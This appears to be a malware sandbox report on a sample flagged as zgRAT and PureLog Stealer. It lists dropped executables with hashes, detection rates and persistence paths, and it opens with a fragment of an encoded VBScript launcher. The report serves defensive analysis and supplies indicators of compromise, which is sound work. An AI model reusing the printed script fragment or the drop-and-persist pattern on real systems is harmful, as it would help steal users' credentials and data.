Preview:	#@~^vwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v&T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJZGswKx+.Y"n\b+Aw.DWhKxkDGDJzp`\B5xV:vHoO (lOJB~!BPWC^/+oj0AAA==^#~@.

C:\ComponentReviewperfmonitor\WmiPrvSE.exe

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3700736
Entropy (8bit):	7.825669080809428
Encrypted:	false
SSDEEP:	98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
MD5:	E7870CD0C30A52066C454C15A5A5A2F5
SHA1:	FC64203E05C104A116E7E4C354C9EE77C99737D6
SHA-256:	E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
SHA-512:	3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComponentReviewperfmonitor\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentReviewperfmonitor\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentReviewperfmonitor\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentReviewperfmonitor\WmiPrvSE.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tUg.................p8...........8.. ....8...@.. ........................8...........@...................................8.K.....8. .....................8...................................................... ............... ..H............text....o8.. ...p8................. ..`.rsrc... .....8......r8.............@....reloc........8......v8.............@..B..................8.....H..........................B.-.;.8......................................0..........(.... ........8........E....N...)...M.......8I...(.... ....~r...{....9....& ....8....(.... ....~r...{....:....& ....8....(.... ....8........0.......... ........8........E....R.......................8M...r...ps....z....~....(T...~....(X... ....?.... ....~r...{....9....& ....8....~....(L... .... .... ....s....~....(P....... ....8[...8.... ....~r...{....:B...& ....87...~....9.... ....8#........

C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3700736
Entropy (8bit):	7.825669080809428
Encrypted:	false
SSDEEP:	98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
MD5:	E7870CD0C30A52066C454C15A5A5A2F5
SHA1:	FC64203E05C104A116E7E4C354C9EE77C99737D6
SHA-256:	E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
SHA-512:	3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tUg.................p8...........8.. ....8...@.. ........................8...........@...................................8.K.....8. .....................8...................................................... ............... ..H............text....o8.. ...p8................. ..`.rsrc... .....8......r8.............@....reloc........8......v8.............@..B..................8.....H..........................B.-.;.8......................................0..........(.... ........8........E....N...)...M.......8I...(.... ....~r...{....9....& ....8....(.... ....~r...{....:....& ....8....(.... ....8........0.......... ........8........E....R.......................8M...r...ps....z....~....(T...~....(X... ....?.... ....~r...{....9....& ....8....~....(L... .... .... ....s....~....(P....... ....8[...8.... ....~r...{....:B...& ....87...~....9.... ....8#........

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Bootstrapper.exe_2089d253ff582166559cfbd4beb56f55b82b71_302a1b6e_c587e25d-a4ad-4da5-bbb4-220a15b06fda\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.263074716093098
Encrypted:	false
SSDEEP:	192:oVrs67Ir0bU9+dQFa+Bejol2/fsLzuiFWZ24lO8dE:Grs+XbG+dQFael23sLzuiFWY4lO8d
MD5:	23DBCCF698CA0CBC22C0A5C68AA86BF1
SHA1:	44556552F97699FEE314A5A80486C6234D8E4A58
SHA-256:	14DA3C8D64EF310D2314700BBCC7EB2FAB82FF9985F02C088FF8508760C0D6F7
SHA-512:	0D57727DFC2133CC7E03FD9CB8321222745E3CC8D623A94F921E8598639C4CDE2139C9A015CA179DDDFAB604DFF6335093A952846834ED62E2F5DBC7FD569E03
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.7.0.6.2.3.5.9.8.1.1.5.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.7.0.6.2.3.6.9.4.9.9.0.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.8.7.e.2.5.d.-.a.4.a.d.-.4.d.a.5.-.b.b.b.4.-.2.2.0.a.1.5.b.0.6.f.d.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.6.c.7.c.1.e.-.0.f.3.a.-.4.7.3.f.-.8.b.d.f.-.a.3.4.e.c.f.5.d.0.3.1.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.o.l.a.r.a.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.6.c.-.0.0.0.1.-.0.0.1.4.-.f.1.2.2.-.8.c.c.d.9.f.4.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.e.1.7.3.6.3.1.c.a.d.c.4.a.7.6.9.5.d.3.9.9.5.7.a.1.2.d.e.9.c.0.0.0.0.0.0.0.0.!.0.0.0.0.3.0.2.3.1.a.4.6.7.a.4.9.c.c.3.7.7.6.8.e.e.a.0.f.5.5.f.4.b.e.a.1.c.b.f.b.4.8.e.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC9EE.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Sun Dec 15 03:17:16 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	614482
Entropy (8bit):	3.2763015439697587
Encrypted:	false
SSDEEP:	6144:rjT2A3QIbIBqjpy0U6sslxsNWAqfQZ0QOePP:r7QIbIBqjwpjslxsNWAqc0Qf
MD5:	BB419A81968935F3F64F275B26F9DBB0
SHA1:	5ED6A406E689AB869FF8CC6D0C36C27DA2AA788B
SHA-256:	BBDF9EF36EF8275485D0E397FA08D41EDBFFACDBA667F8812D9CDFF5D1CDFA23
SHA-512:	5E02A41F3951819080BEA63ADD1AC06640CDD308764AFEC92F83F1E5B2F2960053B65DF4AF493E58A6D5E6AD4817B24F5BFDF0BC31275CD4AC893F467B64E551
Malicious:	false
Preview:	MDMP..a..... .......<J^g............d...........<...........<....)...........)......tT..............l.......8...........T............V..R............F...........G..............................................................................eJ.......H......Lw......................T.......l...+J^g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC60.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6804
Entropy (8bit):	3.717797389677094
Encrypted:	false
SSDEEP:	192:R6l7wVeJfDZF8lwYZ68HprA89bLvCfa5m:R6lXJLZF8lwYQcLKfN
MD5:	B5FBD2E2759D8738CC78794F57290B26
SHA1:	B2471FDE4794E25CDFE8DE4F5D17C474C5755316
SHA-256:	3AB8658BD08E2FF3AD242746DF6B1FD84C919563003F7DC53C5D854D40DE9CFB
SHA-512:	D95D7B734346ECE2A727B6ACEFDA78262406908B382E8D25174A986D1E5C32A5EF0FD9DEAA6EB1EA3DA222C904DCEE345FF0C8E07BD3DFD02ED845E416A8AB7A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCCB0.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4809
Entropy (8bit):	4.45119278174389
Encrypted:	false
SSDEEP:	48:cvIwWl8zsqJg771I9/TL0WpW8VY+Ym8M4Jk/FJyq8vpXDhfeBd:uIjf4I7cTLt7VqJCW9Nf6d
MD5:	5E262C1962EE9EEDAA5F517B98B43052
SHA1:	2518FA9FAF558EBB31EBD0CE069D76AD5DC43C33
SHA-256:	503046FDFA6F1394FA581857A2E58014BB125F9308772201A82BD69115879F4A
SHA-512:	CFA54B99EE812DF34586296B3AE7247F84E2251333609A872525F47D428C474A420D96AF74D0E0C43F18709F0A77D630FD0105304B47AE09A0CB14815454A2CC
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="631819" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Recovery\659c2d566c795c

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	ASCII text, with very long lines (978), with no line terminators
Category:	dropped
Size (bytes):	978
Entropy (8bit):	5.9130391713448445
Encrypted:	false
SSDEEP:	24:q/KIfcD09O1LfIccg5dr2X4HEguZDZKcVA92+gs8+fcGj:ql3OlAgfaokB3d+gs1
MD5:	748EE6072BC941CD05165D3ED3736D88
SHA1:	33CC3797A7E47ABE1B254FF60300299EA1E494B7
SHA-256:	88B7F0874414A76FA43A9074E7A30CCFC04ACA316BDDCA63179C1BA65A2C0B12
SHA-512:	3C4081A5396630CBC6C380415059ED1DEECC1468099E76B08638E3F0837490D9B8CA80D4921845A5436811505D4EF1A02DC77F1BCAB64CA5574CDB66FD580671
Malicious:	false
Preview:	H5lTOgd8IeHjmTj9TrQ4sjBLG7fY2cp85f39P60ZUmSAMbjVpCC4T5Qh4aNQBEGpzJnGZjtX11jGRA9oYKs0auoAPWFzsjXQfmKCxc5FSpCcVKQ4bi21VQPEen1De4oRdTkoz615OnhvsLoFFLXKrg4PXGhJk1lXAu9CjmEfr6msseWT8w7Thek7ZURtYrUXCJu7MmfdG2du3Lh2tOKx3R0gKBnPUUG9mPqiuZGWReNoB0DNxY9JhgduTNxK9QIvwdIoe8IUHygZEMfT7Zc6V6bFv5Pgm6XBVb2hsZsyPpBtADqGsdMjxMazCC2jtmrLafEmU7kirnqp4sFsPIxItyNIACfphJFn7zSf9Ewu2o1Jgu4T7KTkzjcmR5lRc4AhiDsFajsKWCPE6DmQILsXzfxYXqNEcfS7nTlcCz2XbJNwTYpNTVIQMnsDPTruWos1uSbmcJOTTV6qRBF9A9uHWBvAlhNsHIBwaWCA6DvJGz71rCwOOsuW3letgaB46fLKTJP48EC6OlAgD4Sjv8dYYp3z1SegC0Nlowhiw1PKqxISk8pmHcJ7CxwoQaCpjf4XYZ2QWuw3tTrkhkO3n1YjrPi0A3RVyjkK2u3LFYQXpPOsFMHpMJCsHUqI0BQdcbFJsgrwrCyOlB4bBzvxwmJph2DiEvVEHw4NKF9ieU8JVyGGaPHAQdq0SZm0dJs5rtGyHqQ6zMTbo9Tsv7HzoUyoGD5udJFVmCclrR9t8KKDJPLSF3EgB3RX5bsDvfdqG7zlhsBe7Y0dJuf12nojEjTsvFpQi58drd6LZjvX1kimCxNL61KI03mhoG0cCv5BaXvpxTbS1RseBqq81eTrv0my1ZhStSUGogMpBhXnZ2QjKIf7a2khbOQkv6yYvJij6lzfeA6UHqR2kCnt3j11swoaPm4Et91QTrmiSAda5Qav7YAsSFeLRr0J7ZP1G1lIyAj2aFa2Gb5cW3c1mLwoeq

C:\Recovery\Registry.exe

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3700736
Entropy (8bit):	7.825669080809428
Encrypted:	false
SSDEEP:	98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
MD5:	E7870CD0C30A52066C454C15A5A5A2F5
SHA1:	FC64203E05C104A116E7E4C354C9EE77C99737D6
SHA-256:	E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
SHA-512:	3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\Registry.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\Registry.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tUg.................p8...........8.. ....8...@.. ........................8...........@...................................8.K.....8. .....................8...................................................... ............... ..H............text....o8.. ...p8................. ..`.rsrc... .....8......r8.............@....reloc........8......v8.............@..B..................8.....H..........................B.-.;.8......................................0..........(.... ........8........E....N...)...M.......8I...(.... ....~r...{....9....& ....8....(.... ....~r...{....:....& ....8....(.... ....8........0.......... ........8........E....R.......................8M...r...ps....z....~....(T...~....(X... ....?.... ....~r...{....9....& ....8....~....(L... .... .... ....s....~....(P....... ....8[...8.... ....~r...{....:B...& ....87...~....9.... ....8#........

C:\Recovery\ee2ad38f3d4382

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	ASCII text, with very long lines (383), with no line terminators
Category:	dropped
Size (bytes):	383
Entropy (8bit):	5.842039663210909
Encrypted:	false
SSDEEP:	6:u3UiquCRFKaiVK//hMvMTd1SG25AGhMC8ax9SUUaVrEOlOWP1FUpcLaX8nM3nAR+:eUiquCrlhMvAE5AGWC8a2NaV1sI4pcWR
MD5:	43F25D31B861E4EDD7A4BD7FA2F5D381
SHA1:	6DE65C4137893D1196D2A400C318048146BE4F98
SHA-256:	0F59F833C5248D6166540A2E09EAF08B0D12E3A823ECB568ECDC0D524F709B20
SHA-512:	FC48CA64EB8590D92FF5FC762351114843CF16CD9F9F74E90CABBADB03EC4420BD3C5A1CB8744FE75C2E64BF5AF9BC75382DF15A4DB5B79AAD74EACC226FDB02
Malicious:	false
Preview:	NxnqTjoztG21L8QudydM4WWATnSLcK1JmrSl6HHMCG8NOkJlkVVr5nc1bmXqRcWiOsOdpoxWqRJxXJvsdqkHyKO9ObKUub4jtZ8fVq65i9AoepdS1oNk1PuEePONedmPXjE8KQXwupizJjej82cFOUsdp4BGcsbFXuR5leHlQa0Mr444uoOmAgBC1kTQPRUBOccYSj8eu1zxdfwu9GVxdyF0tODAL1W9Fy8ObgmLqu1IrNjVyiRI5hhZXlpEf7S3fzspghTddJHt66JfpsMnjNDiQj100hqsb8m1f3zQPypwZycabKZxvpTSvKY7qcm6dYR8USAv36YviRIcGaYqH27wpTGVf1jwLsSBgeGJJo4yRhudB51QE5ykbfTALoP

C:\Recovery\tQRjIvxcBsFMaEOtv.exe

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3700736
Entropy (8bit):	7.825669080809428
Encrypted:	false
SSDEEP:	98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
MD5:	E7870CD0C30A52066C454C15A5A5A2F5
SHA1:	FC64203E05C104A116E7E4C354C9EE77C99737D6
SHA-256:	E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
SHA-512:	3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tUg.................p8...........8.. ....8...@.. ........................8...........@...................................8.K.....8. .....................8...................................................... ............... ..H............text....o8.. ...p8................. ..`.rsrc... .....8......r8.............@....reloc........8......v8.............@..B..................8.....H..........................B.-.;.8......................................0..........(.... ........8........E....N...)...M.......8I...(.... ....~r...{....9....& ....8....(.... ....~r...{....:....& ....8....(.... ....8........0.......... ........8........E....R.......................8M...r...ps....z....~....(T...~....(X... ....?.... ....~r...{....9....& ....8....~....(L... .... .... ....s....~....(P....... ....8[...8.... ....~r...{....:B...& ....87...~....9.... ....8#........

C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\659c2d566c795c

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	ASCII text, with very long lines (679), with no line terminators
Category:	dropped
Size (bytes):	679
Entropy (8bit):	5.884840937974542
Encrypted:	false
SSDEEP:	12:uNaFLVsjDMUy8AvCMcTlqLO2o8N9oR1WB4RLMJSekE/uSEaw2NUr6RbJXCFM9O:uNQVso8wshqLJo8N9oR84RL5kPuvqJXO
MD5:	F8462F11776468DC5133A4DDD2ED938F
SHA1:	0379675E33A8C19FF0BFA2F528C7F1F1D34BBB59
SHA-256:	A20A24A8F1EFC3D0889DB2A5A56E06CCB0865C101D842C6D09F19E09EE9755ED
SHA-512:	73F305072458AA4A736657A8F5204A810B7427D3C728E0A5F8B3517C33C46174E6099121887F8DEC0027B5E1E698DF5D1210BEE562507D209D2B443C3FB3493F
Malicious:	false
Preview:	z1li61hapLxxOQXBO5xu70lg0lqCmCqrD4qNiiGph2Uq1uyHAoOaBis9PEsUKeymeGtUjJdpyIMFg4pFxjC7yQpfMr7e0veDErLuBeh0Lil2WndVZmhlb1yObOI2M9zDnJAyt4ESBMvPowJiOmFNN3lN36TwWpoMtiPMmpleiPjPFijoFjoj3mzthx4wlR6WhjgGh66jAkp8UWHUXorxBESHsfpyuz3QTNrgCdHJmEjT71ZLpjZ6kIVcQZXBRHyKqYoGolS3ghK6f9J1FeJLa6pK2OPnFG1fQYmiMSgDRfaC8Y7RPf5x8ntuteOZVoxapopGWlpx7F35gmLdR8YkKEhmo2ysEGsmrAWTs05n0Iz2tyNGSuIXQNPlHCbdw6s0XQNgP1vaDutCPo30psZT7VWdvvMpZb03Z8fckr1a9sTfeMVdJlyEhY3B4tvdpFBm3zmQIaP718UPB09iZtfxnwWAFdi16Xv4qrmojFUtW0NiEnAEuME6jO9HdlKp2YBdMZiUNV9UYwawjx6cddGtTzUcsfK74p18ytVoEq1ZNthxxMhqpsMZRSKXEFlsKBat5c7zbRXwmrgjShpf7eRLccrgi8j8EIPMTx1VOsOYVZwjvkFhaFvptOQcubRcrYrdcUQepURPP30DpHu73Ci8XjcFgZkxavr6rTHbUk1

C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\tQRjIvxcBsFMaEOtv.exe

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3700736
Entropy (8bit):	7.825669080809428
Encrypted:	false
SSDEEP:	98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
MD5:	E7870CD0C30A52066C454C15A5A5A2F5
SHA1:	FC64203E05C104A116E7E4C354C9EE77C99737D6
SHA-256:	E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
SHA-512:	3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tUg.................p8...........8.. ....8...@.. ........................8...........@...................................8.K.....8. .....................8...................................................... ............... ..H............text....o8.. ...p8................. ..`.rsrc... .....8......r8.............@....reloc........8......v8.............@..B..................8.....H..........................B.-.;.8......................................0..........(.... ........8........E....N...)...M.......8I...(.... ....~r...{....9....& ....8....(.... ....~r...{....:....& ....8....(.... ....8........0.......... ........8........E....R.......................8M...r...ps....z....~....(T...~....(X... ....?.... ....~r...{....9....& ....8....~....(L... .... .... ....s....~....(P....... ....8[...8.... ....~r...{....:B...& ....87...~....9.... ....8#........

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Mscrt.exe.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1698
Entropy (8bit):	5.367720686892084
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
MD5:	2C0A3C5388C3FAAFA50C8FB701A28891
SHA1:	D75655E5C231DE60C96FD196658C429E155BEB0F
SHA-256:	A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
SHA-512:	0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Download File

Process:	C:\Users\user\Desktop\wmdqEYgW2i.exe
File Type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	819200
Entropy (8bit):	5.598261375667174
Encrypted:	false
SSDEEP:	12288:qhd8cjaLXVh84wEFkW1mocaBj6WtiRPpptHxQ0z:2ycjar84w5W4ocaBj6y2tHDz
MD5:	02C70D9D6696950C198DB93B7F6A835E
SHA1:	30231A467A49CC37768EEA0F55F4BEA1CBFB48E2
SHA-256:	8F2E28588F2303BD8D7A9B0C3FF6A9CB16FA93F8DDC9C5E0666A8C12D6880EE3
SHA-512:	431D9B9918553BFF4F4A5BC2A5E7B7015F8AD0E2D390BB4D5264D08983372424156524EF5587B24B67D1226856FC630AACA08EDC8113097E0094501B4F08EFEB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....5g.........."......v............... ....@...... ....................................`.................................................4...T.......u............................................................................................ ..H............text....t... ...v.................. ..`.rsrc...u............x..............@..@.reloc...............~..............@..BH...........\|............................................................0..R.......(....:....r...p(....r...po....:-...r-..pr&..p.. (.....@....r...pr<..p(....(....&.......0..........rL..prT..p.(....s....%.o....%.o....%.o....%.o.....s.......o.....o....&.o....o......(....9.....o....o.............9.....o.............8.8p.......0..8.......r\..p.......%...%.r^..p.%...%.r...p.%...%.r...p.(...........(....~....%:....&~.........s....%.....(...+...0..l.........(....r...p(....(....r\..p.

C:\Users\user\AppData\Local\Temp\C7dhHeH1wD.bat

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	167
Entropy (8bit):	5.100163159885885
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mvIg6isMxG94bBktKcKZG1t+kiE2J5xAItN2LHK:hCRLuVFOOr+DEQoDA6KOZG1wkn23ftNl
MD5:	1AD4121D66BEE37012CED4F5AD489118
SHA1:	F8542664A2AAAC1E5694F9AE0148AA45C8FA2BAC
